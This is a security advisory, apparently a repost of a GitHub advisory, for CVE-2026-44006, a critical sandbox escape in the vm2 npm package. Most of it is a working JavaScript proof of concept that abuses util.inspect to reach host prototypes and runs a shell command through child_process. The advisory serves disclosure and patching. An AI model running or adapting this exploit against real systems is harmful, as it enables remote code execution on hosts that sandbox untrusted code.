CVE-2026-44006 - vm2 has a Sandbox Escape Vulnerability
📡 GitHub-Advisory · 2026-05-07
CVE-2026-44006 - vm2 has a Sandbox Escape Vulnerability
CVE-2026-44006
GHSA-qcp4-v2jj-fjx8 CRITICAL npm/vm2
CVE: CVE-2026-44006
Summary
It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes
Details
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
PoC
let obj = {
subarray: Buffer.prototype.inspect,
slice: Buffer.prototype.slice,
hexSlice: () => '',
};
let sym;
obj.slice(10, {
showHidden: true,
showProxy: true,
depth: 10,
stylize(a) {
const handler = this.seen && this.seen[1];
if (handler && handler.getPrototypeOf) {
gP = handler.getPrototypeOf;
HObjectProto = gP(gP(gP(gP(Buffer))));
HObject = HObjectProto.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
}
return a;
},
});
obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor('return process')()
.getBuiltinModule('child_process')
.execSync('id', { stdio: 'inherit' });
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});Impact
Sandbox Escape -> RCE
📌 来源: GitHub-Advisory | 🆔 CVE-2026-44006 | 📅 2026-05-07